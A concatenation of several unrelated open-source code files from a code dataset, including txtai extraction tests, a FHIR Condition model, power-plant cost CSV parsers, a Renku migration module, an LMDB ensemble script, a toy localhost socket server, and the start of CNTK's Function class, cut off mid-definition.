#jdbc_dataset_example(spark)
spark.stop() |
the-stack_0_6148 | """
Summary module tests
"""
import unittest
from txtai.pipeline import Textractor
# pylint: disable = C0411
from utils import Utils
class TestTextractor(unittest.TestCase):
"""
Textractor tests
"""
def testParagraphs(self):
"""
Tests extraction to paragraphs
"""
textractor = Textractor(paragraphs=True)
# Extract text as sentences
paragraphs = textractor(Utils.PATH + "/article.pdf")
# Check number of paragraphs is as expected
self.assertEqual(len(paragraphs), 13)
def testSentences(self):
"""
Tests extraction to sentences
"""
textractor = Textractor(sentences=True)
# Extract text as sentences
sentences = textractor(Utils.PATH + "/article.pdf")
# Check number of sentences is as expected
self.assertEqual(len(sentences), 17)
def testSingle(self):
"""
Tests a single extraction with no tokenization of the results
"""
textractor = Textractor()
# Extract text as a single block
text = textractor(Utils.PATH + "/article.pdf")
# Check length of text is as expected
self.assertEqual(len(text), 2301)
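

# --- Illustrative note (not in the original test module) ---
# These tests are normally picked up by the project's test runner; to run just
# this module directly, the standard unittest entry point below can be used.
if __name__ == "__main__":
    unittest.main()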
|
the-stack_0_6153 | # -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/Condition
Release: R4
Version: 4.0.1
Build ID: 9346c8cc45
Last updated: 2019-11-01T09:29:23.356+11:00
"""
import sys
from . import backboneelement, domainresource
class Condition(domainresource.DomainResource):
""" Detailed information about conditions, problems or diagnoses.
A clinical condition, problem, diagnosis, or other event, situation, issue,
or clinical concept that has risen to a level of concern.
"""
resource_type = "Condition"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.abatementAge = None
""" When in resolution/remission.
Type `Age` (represented as `dict` in JSON). """
self.abatementDateTime = None
""" When in resolution/remission.
Type `FHIRDate` (represented as `str` in JSON). """
self.abatementPeriod = None
""" When in resolution/remission.
Type `Period` (represented as `dict` in JSON). """
self.abatementRange = None
""" When in resolution/remission.
Type `Range` (represented as `dict` in JSON). """
self.abatementString = None
""" When in resolution/remission.
Type `str`. """
self.asserter = None
""" Person who asserts this condition.
Type `FHIRReference` referencing `['Practitioner', 'PractitionerRole', 'Patient', 'RelatedPerson']` (represented as `dict` in JSON). """
self.bodySite = None
""" Anatomical location, if relevant.
List of `CodeableConcept` items (represented as `dict` in JSON). """
self.category = None
""" problem-list-item | encounter-diagnosis.
List of `CodeableConcept` items (represented as `dict` in JSON). """
self.clinicalStatus = None
""" active | recurrence | relapse | inactive | remission | resolved.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.code = None
""" Identification of the condition, problem or diagnosis.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.encounter = None
""" Encounter created as part of.
Type `FHIRReference` referencing `['Encounter']` (represented as `dict` in JSON). """
self.evidence = None
""" Supporting evidence.
List of `ConditionEvidence` items (represented as `dict` in JSON). """
self.identifier = None
""" External Ids for this condition.
List of `Identifier` items (represented as `dict` in JSON). """
self.note = None
""" Additional information about the Condition.
List of `Annotation` items (represented as `dict` in JSON). """
self.onsetAge = None
""" Estimated or actual date, date-time, or age.
Type `Age` (represented as `dict` in JSON). """
self.onsetDateTime = None
""" Estimated or actual date, date-time, or age.
Type `FHIRDate` (represented as `str` in JSON). """
self.onsetPeriod = None
""" Estimated or actual date, date-time, or age.
Type `Period` (represented as `dict` in JSON). """
self.onsetRange = None
""" Estimated or actual date, date-time, or age.
Type `Range` (represented as `dict` in JSON). """
self.onsetString = None
""" Estimated or actual date, date-time, or age.
Type `str`. """
self.recordedDate = None
""" Date record was first recorded.
Type `FHIRDate` (represented as `str` in JSON). """
self.recorder = None
""" Who recorded the condition.
Type `FHIRReference` referencing `['Practitioner', 'PractitionerRole', 'Patient', 'RelatedPerson']` (represented as `dict` in JSON). """
self.severity = None
""" Subjective severity of condition.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.stage = None
""" Stage/grade, usually assessed formally.
List of `ConditionStage` items (represented as `dict` in JSON). """
self.subject = None
""" Who has the condition?.
Type `FHIRReference` referencing `['Patient', 'Group']` (represented as `dict` in JSON). """
self.verificationStatus = None
""" unconfirmed | provisional | differential | confirmed | refuted |
entered-in-error.
Type `CodeableConcept` (represented as `dict` in JSON). """
super(Condition, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(Condition, self).elementProperties()
js.extend(
[
(
"abatementAge",
"abatementAge",
age.Age,
"Age",
False,
"abatement",
False,
),
(
"abatementDateTime",
"abatementDateTime",
fhirdate.FHIRDate,
"dateTime",
False,
"abatement",
False,
),
(
"abatementPeriod",
"abatementPeriod",
period.Period,
"Period",
False,
"abatement",
False,
),
(
"abatementRange",
"abatementRange",
range.Range,
"Range",
False,
"abatement",
False,
),
(
"abatementString",
"abatementString",
str,
"string",
False,
"abatement",
False,
),
(
"asserter",
"asserter",
fhirreference.FHIRReference,
"Reference",
False,
None,
False,
),
(
"bodySite",
"bodySite",
codeableconcept.CodeableConcept,
"CodeableConcept",
True,
None,
False,
),
(
"category",
"category",
codeableconcept.CodeableConcept,
"CodeableConcept",
True,
None,
False,
),
(
"clinicalStatus",
"clinicalStatus",
codeableconcept.CodeableConcept,
"CodeableConcept",
False,
None,
False,
),
(
"code",
"code",
codeableconcept.CodeableConcept,
"CodeableConcept",
False,
None,
False,
),
(
"encounter",
"encounter",
fhirreference.FHIRReference,
"Reference",
False,
None,
False,
),
(
"evidence",
"evidence",
ConditionEvidence,
"ConditionEvidence",
True,
None,
False,
),
(
"identifier",
"identifier",
identifier.Identifier,
"Identifier",
True,
None,
False,
),
(
"note",
"note",
annotation.Annotation,
"Annotation",
True,
None,
False,
),
("onsetAge", "onsetAge", age.Age, "Age", False, "onset", False),
(
"onsetDateTime",
"onsetDateTime",
fhirdate.FHIRDate,
"dateTime",
False,
"onset",
False,
),
(
"onsetPeriod",
"onsetPeriod",
period.Period,
"Period",
False,
"onset",
False,
),
(
"onsetRange",
"onsetRange",
range.Range,
"Range",
False,
"onset",
False,
),
("onsetString", "onsetString", str, "string", False, "onset", False),
(
"recordedDate",
"recordedDate",
fhirdate.FHIRDate,
"dateTime",
False,
None,
False,
),
(
"recorder",
"recorder",
fhirreference.FHIRReference,
"Reference",
False,
None,
False,
),
(
"severity",
"severity",
codeableconcept.CodeableConcept,
"CodeableConcept",
False,
None,
False,
),
("stage", "stage", ConditionStage, "ConditionStage", True, None, False),
(
"subject",
"subject",
fhirreference.FHIRReference,
"Reference",
False,
None,
True,
),
(
"verificationStatus",
"verificationStatus",
codeableconcept.CodeableConcept,
"CodeableConcept",
False,
None,
False,
),
]
)
return js
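

# --- Illustrative sketch (not part of the generated model) ---
# A minimal example of building a Condition from a JSON-style dict; the codes
# and references below are invented for illustration only.
def _example_condition():
    data = {
        "resourceType": "Condition",
        "clinicalStatus": {"coding": [{"code": "active"}]},
        "code": {"text": "Example diagnosis"},
        "subject": {"reference": "Patient/example"},
    }
    cond = Condition(jsondict=data)
    return cond.code.text  # -> "Example diagnosis"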
class ConditionEvidence(backboneelement.BackboneElement):
""" Supporting evidence.
Supporting evidence / manifestations that are the basis of the Condition's
verification status, such as evidence that confirmed or refuted the
condition.
"""
resource_type = "ConditionEvidence"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.code = None
""" Manifestation/symptom.
List of `CodeableConcept` items (represented as `dict` in JSON). """
self.detail = None
""" Supporting information found elsewhere.
List of `FHIRReference` items referencing `['Resource']` (represented as `dict` in JSON). """
super(ConditionEvidence, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ConditionEvidence, self).elementProperties()
js.extend(
[
(
"code",
"code",
codeableconcept.CodeableConcept,
"CodeableConcept",
True,
None,
False,
),
(
"detail",
"detail",
fhirreference.FHIRReference,
"Reference",
True,
None,
False,
),
]
)
return js
class ConditionStage(backboneelement.BackboneElement):
""" Stage/grade, usually assessed formally.
Clinical stage or grade of a condition. May include formal severity
assessments.
"""
resource_type = "ConditionStage"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.assessment = None
""" Formal record of assessment.
List of `FHIRReference` items referencing `['ClinicalImpression', 'DiagnosticReport', 'Observation']` (represented as `dict` in JSON). """
self.summary = None
""" Simple summary (disease specific).
Type `CodeableConcept` (represented as `dict` in JSON). """
self.type = None
""" Kind of staging.
Type `CodeableConcept` (represented as `dict` in JSON). """
super(ConditionStage, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ConditionStage, self).elementProperties()
js.extend(
[
(
"assessment",
"assessment",
fhirreference.FHIRReference,
"Reference",
True,
None,
False,
),
(
"summary",
"summary",
codeableconcept.CodeableConcept,
"CodeableConcept",
False,
None,
False,
),
(
"type",
"type",
codeableconcept.CodeableConcept,
"CodeableConcept",
False,
None,
False,
),
]
)
return js
try:
from . import age
except ImportError:
age = sys.modules[__package__ + ".age"]
try:
from . import annotation
except ImportError:
annotation = sys.modules[__package__ + ".annotation"]
try:
from . import codeableconcept
except ImportError:
codeableconcept = sys.modules[__package__ + ".codeableconcept"]
try:
from . import fhirdate
except ImportError:
fhirdate = sys.modules[__package__ + ".fhirdate"]
try:
from . import fhirreference
except ImportError:
fhirreference = sys.modules[__package__ + ".fhirreference"]
try:
from . import identifier
except ImportError:
identifier = sys.modules[__package__ + ".identifier"]
try:
from . import period
except ImportError:
period = sys.modules[__package__ + ".period"]
try:
from . import range
except ImportError:
range = sys.modules[__package__ + ".range"]
|
the-stack_0_6154 | import os
from functools import reduce
from itertools import count, islice, cycle
import numpy as np
import pandas as pd
from pandas.api.types import is_string_dtype
pd.set_option('display.max_columns', 70)
pd.set_option('display.max_rows', 200)
def plant_data(dat):
"""
Takes the first part of the dataframe from the CSV file from the tables included in BEIS_Electricity_Generation_Cost_Report, and returns a dataframe with powerplants as columns and each data as columns
:param dat: Input dataframe from BEIS_Electricity_Generation_Cost_Report
:return: Returns first part of table, which includes plant size, average load factor, efficiency and operating period with power plants as rows and columns as data about said power plants
"""
characteristics = dat.loc[0:2].dropna(axis='columns').drop(['Unnamed: 1'], axis=1).transpose() # Fills empty column names, deletes units, and transposes dataframe so that plants are as rows
operating_period = dat.loc[9].dropna().drop(['Unnamed: 1']).transpose().to_frame() # Transposes operating period and drops units
dat = characteristics.merge(operating_period, left_index=True, right_index=True) # Merges the two series together to form a single dataframe
dat = dat.rename(index=str, columns = {0:"Plant_Size",1:"Average_Load_Factor",2:"Efficiency",9:"Operating_Period"}) # Rename columns
return dat
def development_period(dat):
"""
Takes the entire dataframe from a table included in BEIS_Electricity_Generation_Cost_Report and returns data about the pre-development and construction cost expenditure information per year
:param dat: Dataframe of the table included in BEIS_Electricity_Generation_Cost_Report
:return: Returns a dataframe of power plant data which contains pre-development and construction expenditure information per year
"""
dat = dat.iloc[3:9].copy()
dat.iloc[:, 0] = dat.iloc[:, 0].fillna(method='ffill')
dat.iloc[:, 0] = dat.iloc[:, 0].replace({ # Shorten column names
"Pre-development period ":"Pre", "Construction period ":"Constr"})
dat.iloc[:, 1] = dat.iloc[:, 1].replace({ # Shorten column names
"Duration and % spend per years 1 & 2 ": "Dur,1,2",
"% spend per years 3, 4, & 5 ": "3,4,5",
"% spend per years 6, 7, & 8 ": "6,7,8"})
dat['A'], dat['B'], dat['C'] = dat.iloc[:, 1].str.split(',', 2).str # Split duration and spend per year to respective column
dat = dat.drop(['Unnamed: 1'], axis=1)
dat['A'], dat['B'], dat['C'] = dat['Unnamed: 0'] + "_" + dat['A'], dat['Unnamed: 0'] + "_" + dat['B'], dat['Unnamed: 0'] + "_" + dat['C'] # Merge column name with year information
tot_cols = []
for it in islice(count(), 1, len(dat.columns), 3): # Skip through to columns containing power plant information
cycle_period = cycle(['A', 'B', 'C']) # Cycle through rows to create column names
for val in range(0, 3): # Three values per power plant
period = next(cycle_period)
cols = pd.DataFrame({'plant': dat.columns.values[it],'period': dat[period],'value': dat.iloc[:, it+val]}) # Create dataframe in wide format
tot_cols.append(cols)
db = pd.concat(tot_cols).reset_index().drop(['index'],axis=1) # Concatenate all dataframes
db = db.pivot(index='plant', columns='period', values='value') # Transform dataframe to wide format
return db
def costs(dat):
"""
Takes dataframe from CSV file of BEIS_Electricity_Generation_Cost_Report and returns cost section of data into a wide format with power plant data per row
:param dat: Dataframe starting from Table 19 found in BEIS_Electricity_Generation_Cost_Report
:return: Returns dataframe of cost information in wide format
"""
dat=dat[10:].copy()
dat.iloc[:, 0] = dat.iloc[:, 0].fillna(method='ffill') # Fill in blanks of power plant information
dat.iloc[:, 0] = dat.iloc[:, 0].replace({ # Shorten column names
"Pre-development £/kW ":"Pre_dev_cost", "Construction £/kW ":"Constr_cost",
"Infrastructure £'000s ":"Infra_cost", "Fixed O&M £/MW/year ":"Fixed_cost",
"Variable O&M £/MWh ":"Var_cost","Insurance £/MWh/year ":"Insurance_cost",
"Connection and Use of System charges £/MW/year ":"Connect_system_cost"
})
dat.iloc[:, 0] = dat.iloc[:, 0] + "-" + dat.iloc[:, 1] # Merge cost information with projection (high, medium or low)
dat = dat.drop(['Unnamed: 1'], axis=1)
col_names = []
col_values = []
plant_names = [x for z in range(13) for x in dat.columns if not "Unnamed:" in x for y in range(3)] # Create list containing plant names in correct order
for x in dat[2:].itertuples(index=False): # Loop through each row of dataframe
for j in range(1,len(x)):
col_names.append(x[0]+"_"+dat.iloc[1, j]) # Create column names by merging year of cost with cost type and projection
col_values.append(x[j]) # Take column value
cols_df = pd.DataFrame({'columns':col_names,'plant':plant_names,'col_values':col_values}) # Create dataframe
cols_df = cols_df.pivot(index="plant",values='col_values',columns='columns') # Make into wide format
return cols_df
def merge_plant_cost_tables(df):
"""
Function to bring together all sections of dataframe
:param df: Dataframe starting from Table 19 found in BEIS_Electricity_Generation_Cost_Report
:return: Returns final dataframe found in BEIS_Electricity_Generation_Cost_Report Table 19 in wide format
"""
plant = plant_data(df) # Call functions
dev = development_period(df)
cost = costs(df)
dfs = [plant, dev, cost] # Create a list of dataframes
df_final = reduce(lambda left, right: pd.merge(left,right, left_index=True, right_index=True), dfs) # Merge each dataframe together
return df_final
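

# --- Illustrative usage (not part of the original pipeline) ---
# merge_plant_cost_tables() expects a DataFrame read from one of the BEIS cost
# CSV files; the path below is a placeholder.
def _example_merge_single_table(csv_path="plant_costs_files/some_table.csv"):
    raw = pd.read_csv(csv_path).replace("- ", np.nan)
    return merge_plant_cost_tables(raw)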
def beis_human_to_machine_format(dir):
final_df = []
for file in os.listdir(dir):
file_p = "/Users/b1017579/Documents/PhD/Projects/10. ELECSIM/10. ELECSIM/data/Power_Plants/Power_Plant_costs/plant_costs_files/"+file
df = pd.read_csv(file_p).replace("- ",np.nan)
final_df.append(merge_plant_cost_tables(df))
final_df = pd.concat(final_df)
# Remove comma seperator for increments of 1000 and unit of year
final_df = final_df.apply(lambda x: x.str.replace(',', ''), axis=1).apply(lambda x: x.str.replace(' years',''), axis=1)
# Remove the % sign and divide by 100
final_df = final_df.apply(lambda x: x.str.replace("%", "").astype('float')/100 if is_string_dtype(x) and x.str.contains('%').all() else x)
print(final_df)
return final_df
p_dat = beis_human_to_machine_format("/Users/b1017579/Documents/PhD/Projects/10. ELECSIM/10. ELECSIM/data/Power_Plants/Power_Plant_costs/plant_costs_files")
p_dat.to_csv("/Users/b1017579/Documents/PhD/Projects/10. ELECSIM/10. ELECSIM/data/Power_Plants/Power_Plant_costs/plant_cost_data_nan.csv")
|
the-stack_0_6157 | # -*- coding: utf-8 -*-
#
# Copyright 2020 - Swiss Data Science Center (SDSC)
# A partnership between École Polytechnique Fédérale de Lausanne (EPFL) and
# Eidgenössische Technische Hochschule Zürich (ETHZ).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Initial migrations."""
import os
import shutil
import urllib
import uuid
import posixpath  # posixpath is a top-level module, not part of pathlib
from pathlib import Path
from urllib.parse import quote
from renku.core.management.repository import DEFAULT_DATA_DIR as DATA_DIR
from renku.core.models.datasets import Dataset
from renku.core.models.refs import LinkReference
from renku.core.utils.urls import url_to_string
def migrate(client):
"""Migration function."""
_ensure_clean_lock(client)
_do_not_track_lock_file(client)
_migrate_datasets_pre_v0_3(client)
_migrate_broken_dataset_paths(client)
_fix_uncommitted_labels(client)
_fix_dataset_files_urls(client)
_fix_broken_dataset_file_project(client)
_dataset_file_id_migration(client)
_migrate_files_project(client)
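

# Note: the helpers below are guarded with existence checks and try/except
# blocks, so re-running this migration on an already-migrated repository is
# intended to be a no-op.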
def _ensure_clean_lock(client):
"""Make sure Renku lock file is not part of repository."""
lock_file = client.path / '.renku.lock'
try:
lock_file.unlink()
except FileNotFoundError:
pass
def _do_not_track_lock_file(client):
"""Add lock file to .gitingore if not already exists."""
# Add lock file to .gitignore.
lock_file = '.renku.lock'
gitignore = client.path / '.gitignore'
if lock_file not in gitignore.read_text():
gitignore.open('a').write('\n{0}\n'.format(lock_file))
def _migrate_datasets_pre_v0_3(client):
"""Migrate datasets from Renku 0.3.x."""
def _dataset_pre_0_3(client):
"""Return paths of dataset metadata for pre 0.3.4."""
project_is_pre_0_3 = int(client.project.version) < 2
if project_is_pre_0_3:
return (client.path / DATA_DIR).rglob(client.METADATA)
return []
for old_path in _dataset_pre_0_3(client):
name = str(old_path.parent.relative_to(client.path / DATA_DIR))
dataset = Dataset.from_yaml(old_path, client=client)
new_path = (client.renku_datasets_path / dataset.uid / client.METADATA)
new_path.parent.mkdir(parents=True, exist_ok=True)
with client.with_metadata(read_only=True) as meta:
for module in client.repo.submodules:
if Path(module.url).name == meta.name:
module.remove()
for file_ in dataset.files:
if not Path(file_.path).exists():
expected_path = (
client.path / DATA_DIR / dataset.name / file_.path
)
if expected_path.exists():
file_.path = expected_path.relative_to(client.path)
dataset.__reference__ = new_path.relative_to(client.path)
dataset.to_yaml()
Path(old_path).unlink()
ref = LinkReference.create(
client=client,
name='datasets/{0}'.format(name),
force=True,
)
ref.set_reference(new_path)
def _migrate_broken_dataset_paths(client):
"""Ensure all paths are using correct directory structure."""
for dataset in client.datasets.values():
dataset_path = client.path / dataset.path
expected_path = (
client.renku_datasets_path /
Path(quote(dataset.identifier, safe=''))
)
# migrate the refs
ref = LinkReference.create(
client=client,
name='datasets/{0}'.format(dataset.short_name),
force=True,
)
ref.set_reference(expected_path / client.METADATA)
if not dataset_path.exists():
dataset_path = (
client.renku_datasets_path / uuid.UUID(dataset.identifier).hex
)
if not expected_path.exists():
shutil.move(dataset_path, expected_path)
dataset.path = expected_path
dataset.__reference__ = expected_path / client.METADATA
for file_ in dataset.files:
file_path = Path(file_.path)
if not file_path.exists() and file_.path.startswith('..'):
new_path = (
client.renku_datasets_path / dataset.uid / file_path
).resolve().relative_to(client.path)
file_.path = new_path
_, commit, _ = client.resolve_in_submodules(
client.find_previous_commit(file_.path, revision='HEAD'),
file_.path,
)
host = client.remote.get('host') or 'localhost'
host = os.environ.get('RENKU_DOMAIN') or host
# always set the id by the identifier
file_._id = urllib.parse.urljoin(
'https://{host}'.format(host=host),
posixpath.join(
'/blob/{hexsha}/{path}'.format(
hexsha=commit.hexsha, path=new_path
)
)
)
file_._label = '{}@{}'.format(new_path, commit.hexsha)
dataset.to_yaml()
def _fix_uncommitted_labels(client):
"""Ensure files have correct label instantiation."""
for dataset in client.datasets.values():
for file_ in dataset.files:
try:
_, commit, _ = client.resolve_in_submodules(
client.find_previous_commit(file_.path, revision='HEAD'),
file_.path,
)
file_.commit = commit
if (
not file_._label or 'UNCOMMITTED' in file_._label or
'@' not in file_._label
):
file_._label = file_.default_label()
file_._id = file_.default_id()
except KeyError:
pass
dataset.to_yaml()
def _fix_dataset_files_urls(client):
"""Ensure dataset files have correct url format."""
for dataset in client.datasets.values():
for file_ in dataset.files:
if file_.url:
file_.url = url_to_string(file_.url)
dataset.to_yaml()
def _fix_broken_dataset_file_project(client):
"""Ensure project is correctly set on ``DatasetFile``."""
for dataset in client.datasets.values():
for file_ in dataset.files:
if not file_._project or 'NULL/NULL' in file_._project._id:
file_._project = client.project
dataset.to_yaml()
def _dataset_file_id_migration(client):
"""Ensure dataset files have a fully qualified url."""
for dataset in client.datasets.values():
for file_ in dataset.files:
if not file_._id.startswith('https'):
file_._id = file_.default_id()
dataset.to_yaml()
def _migrate_files_project(client):
"""Ensure dataset files have correct project."""
for dataset in client.datasets.values():
for file_ in dataset.files:
file_._project = dataset._project
dataset.to_yaml()
|
the-stack_0_6158 | import networkx as nx
import re


def build_graph(filename):
    with open(filename) as source:
        text = source.read()
    # "[ins|isa]" was a character class (matches a single character), so an
    # alternation group is needed to match the ins(...)/isa(...) facts.
    regex = re.compile(r"(?:ins|isa)\(i(\d+),i(\d+)\)")
    regex_class = re.compile(r"class\(i(\d+)\)")
    instances = frozenset(regex.findall(text))
    classes = frozenset(regex_class.findall(text))  # parsed but currently unused
    # create directed graph on the instances
    G = nx.DiGraph()
    G.add_edges_from(instances)
    return G
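

# --- Illustrative usage (not in the original script) ---
# build_graph() expects a file of Prolog-style facts such as "ins(i1,i2)."; the
# example below writes a tiny fact file to a temporary location first.
def _example_build_graph():
    import os
    import tempfile
    facts = "ins(i1,i2).\nisa(i2,i3).\nclass(i3).\n"
    with tempfile.NamedTemporaryFile("w", suffix=".pl", delete=False) as tmp:
        tmp.write(facts)
        path = tmp.name
    try:
        G = build_graph(path)
        return sorted(G.edges())  # [('1', '2'), ('2', '3')]
    finally:
        os.remove(path)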
|
the-stack_0_6159 | import sys
import h5py
import matplotlib.pyplot as plt
if __name__ == "__main__":
with h5py.File(sys.argv[1], "r") as hdf:
# Print the dataset names in the file
datasets = list(hdf)
print(datasets)
# Plot the counter mean values for the 3 counters we know are captured
for i in range(1, 4):
plt.plot(hdf[f"COUNTER{i}.OUT.Mean"], label=f"Counter {i}")
# Add a legend and show the plot
plt.legend()
plt.show()
|
the-stack_0_6160 | import socket
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # set before bind so the address can actually be reused
s.bind(("localhost", 9999))
s.listen(1)
sc, addr = s.accept()

for i in range(3):
    ricevutoByte = sc.recv(4096)
    #ricevuto = str(ricevutoByte, "ascii")
    #print("Ricevuto:", ricevuto)
    if ricevutoByte == bytes("q", "ascii") or ricevutoByte is None:
        break
    command = ricevutoByte[0:4]
    if command == bytes("FIND", "ascii"):
        ricevutoByte = bytes("AFIN003"+"0"*16+"a"*99+"1"+"002"+"192.168.001.001|fc00"+":1000"*7+"12345"+"192.168.001.002|fc00"+":2000"*7+"12345"+"0"*16+"a"*99+"2"+"001"+"192.168.001.003|fc00"+":3000"*7+"12345", "UTF-8")
        #ricevutoByte = bytes("AFIN001"+"0"*16+"a"*99+"1"+"002"+"192.168.001.001|fc00"+":1000"*7+"12345", "UTF-8")
        sc.send(ricevutoByte)

print("Shutdown")
sc.close()
s.close()
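

# --- Illustrative counterpart (not in the original script) ---
# A minimal client sketch for exercising the stub server above; the "FIND"
# payload format is inferred from the handler and is illustrative only.
def _example_client():
    c = socket.socket()
    c.connect(("localhost", 9999))
    c.send(b"FIND" + b"0" * 16)   # placeholder query body
    reply = c.recv(4096)
    c.send(b"q")                  # ask the server loop to stop
    c.close()
    return reply[:4]              # expected to start with b"AFIN"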
|
the-stack_0_6162 | import os
import argparse
import struct
import lmdb
import csv
from dataset import find_inputs
import time
import numpy as np
import pandas as pd
import zlib
parser = argparse.ArgumentParser(description='Process cdiscount datasets')
parser.add_argument('data', metavar='DIR',
help='dir of images')
parser.add_argument('--categories', default='', type=str, metavar='PATH',
help='path to category map file')
def main():
args = parser.parse_args()
start = time.time()
categories = []
if os.path.isfile(args.categories):
category_df = pd.read_csv(args.categories)
categories = category_df.category_id
categories = sorted(categories)
else:
print('WARNIGN: No category mapping found, writing raw label indices into output.')
cf = open(os.path.join('./', 'results-ensemble.csv'), mode='w')
writer = csv.writer(cf)
writer.writerow(['_id', 'category_id'])
dirs = args.data.split(',')
envs = [lmdb.open(d, sync=False, readahead=False, readonly=True, lock=False) for d in dirs]
txns = [e.begin() for e in envs]
cursors = [t.cursor() for t in txns]
num_sources = len(envs)
probs = []
prev_prod_id = -1
written = 0
def _write_result():
if num_sources == len(probs):
result = np.mean(probs, axis=0)
else:
probs_arr = np.array(probs)
for i in range(num_sources):
probs_arr[-i] *= 2.0
result = np.sum(probs_arr, axis=0)
top1_label = np.argmax(result)
writer.writerow([prev_prod_id, categories[top1_label] if categories else top1_label])
try:
iters = [c.iternext(keys=True, values=True) for c in cursors]
while True:
fetches = [i.__next__() for i in iters]
for i, (k, v) in enumerate(fetches):
prod_id, img_id = struct.unpack('>IB', k)
if written % 1000 == 0 and i == 0:
print(prod_id, img_id)
if prev_prod_id > 0 and (i == 0 and prod_id != prev_prod_id):
_write_result()
written += 1
probs = []
va = np.frombuffer(zlib.decompress(v), dtype=np.float32)
prev_prod_id = prod_id
probs.append(va)
except StopIteration:
print('STOP')
pass
if probs:
_write_result()
written += 1
print(written)
print('Inputs via LMDB took', time.time() - start)
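# --- Illustrative sketch (not part of the original tool) ---
# The reader above expects keys packed as big-endian (product_id, image_id) and
# values holding zlib-compressed float32 probability vectors. A writer that
# produces records in that layout might look roughly like this:
def _example_write_probs(lmdb_path, prod_id, img_id, prob_vector):
    env = lmdb.open(lmdb_path, map_size=2 ** 30)
    key = struct.pack('>IB', prod_id, img_id)
    value = zlib.compress(np.asarray(prob_vector, dtype=np.float32).tobytes())
    with env.begin(write=True) as txn:
        txn.put(key, value)
    env.close()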
if __name__ == '__main__':
main() |
the-stack_0_6163 | from os import path
from enum import Enum, unique
import sys
import warnings
import collections
import cntk
from cntk import cntk_py, Value
from cntk.device import DeviceDescriptor, cpu
from cntk.internal import map_if_possible, typemap, sanitize_var_map,\
sanitize_batch, sanitize_dtype_cntk, _as_tuple,\
sanitize_variable_value_dict,\
sanitize_Function_attributes,\
sanitize_variables_or_functions,\
_value_as_sequence_or_array
from cntk.internal.utils import get_python_function_arguments, \
map_function_arguments, _py_dict_to_cntk_dict, \
_to_cntk_dict_value
from cntk.internal import _UDFDeserializeCallbackWrapper, _serialize
from cntk.internal.sanitize import is_byte_buffer
from ..variables import Record, Variable
@unique
class CloneMethod(Enum):
'''
Describes different ways how :func:`~cntk.ops.functions.Function.clone`
works.
'''
share = 'share'
'''
Parameters are shared between the Function being cloned and the new clone
'''
clone = 'clone'
'''
New learnable parameters are created and initialized with the current values of the
corresponding parameters of the Function being cloned
'''
freeze = 'freeze'
'''
Parameters are cloned and made immutable; i.e. Constants in the new clone
(e.g. for use as a fixed feature extractor)
'''
class Function(cntk_py.Function):
'''
Base class of all primitive tensor operators.
If it has only one output, one can invoke Variable methods on it, which it
will relay to its only output.
`Function` objects can also be constructed directly from a Python lambda,
by means of the `@Function` decorator.
The `Function`'s input signature is defined by the lambda.
Example:
>>> @Function
... def f(x):
... return x * x
>>> print(f) # inspect the Function's type
ElementTimes(x: Sequence[tensor]) -> Sequence[tensor]
The above form creates a CNTK Function whose arguments are placeholder variables.
Such a function can only be combined with other symbolic functions.
To train a Function or pass data to it, you need to declare the types
of the arguments. In this case, the @Function decorator creates a CNTK Function
whose arguments are input variables.
If you use Python 3, Functions with types are declared using Python annotation syntax, e.g.::
@Function
def f(x:Tensor[13]):
return x * x
If you are working with Python 2.7, use CNTK's :class:`@Signature <cntk.layers.typing.Signature>` decorator instead::
>>> from cntk.layers.typing import *
>>> @Function
... @Signature(Tensor[13])
... def f(x):
... return x * x
>>> print(f)
ElementTimes(x: Tensor[13]) -> Tensor[13]
``make_block=True`` is an internal parameter used to implement :func:`@BlockFunction <cntk.ops.functions.BlockFunction>`.
If `BlockFunction()` passes `True`, then the result will be wrapped
in :func:`~cntk.ops.as_block()`, using the supplied ``op_name`` and ``name`` parameters, which are otherwise ignored.
'''
_udf_callback_map = {}
_deserializer = _UDFDeserializeCallbackWrapper(_udf_callback_map)
cntk_py._register_udf_deserialize_callback(_deserializer)
# We override the constructors to implement an overload that constructs
# a CNTK Functions from a Python function (@Function).
def __new__(cls, *args, **kwargs):
if len(args) > 0 and hasattr(args[0], '__call__') and not isinstance(args[0], Function): # overload
return Function._to_Function(*args, **kwargs)
return super(Function, cls).__new__(cls) # for some reason, passing *args, **kwargs fails with "object() takes no args
def __init__(self, *args, **kwargs):
if len(args) > 0 and hasattr(args[0], '__call__') and not isinstance(args[0], Function): # overload
return
super(Function, self).__init__(*args, **kwargs)
# TODO: bring this back once we have a design for name-accessible .outputs etc.
#class NamedOutput:
# def __init__(self, **kwargs):
# for kw in kwargs: # TODO: only allow one arg
# self.name = kw
# self.arg = kwargs[kw]
_placeholders_under_construction = set()
@staticmethod
def _to_Function(f, make_block=False, op_name=None, name=None):
'''implements @Function decorator; see :class:`~cntk.layers.functions.Function`'''
f_name = f.__name__ # (only used for debugging and error messages)
# helper to create a CNTK placeholder or input for a given name
# An input is created if the parameter is annotated with a Tensor(...) type.
# In this case, CNTK will immediately trigger type inference.
# Unannotated parameters will yield placeholder variables instead.
from .. import placeholder
def make_arg_variable(name, annotations):
from ..variables import Variable
var_type = annotations.get(name, None)
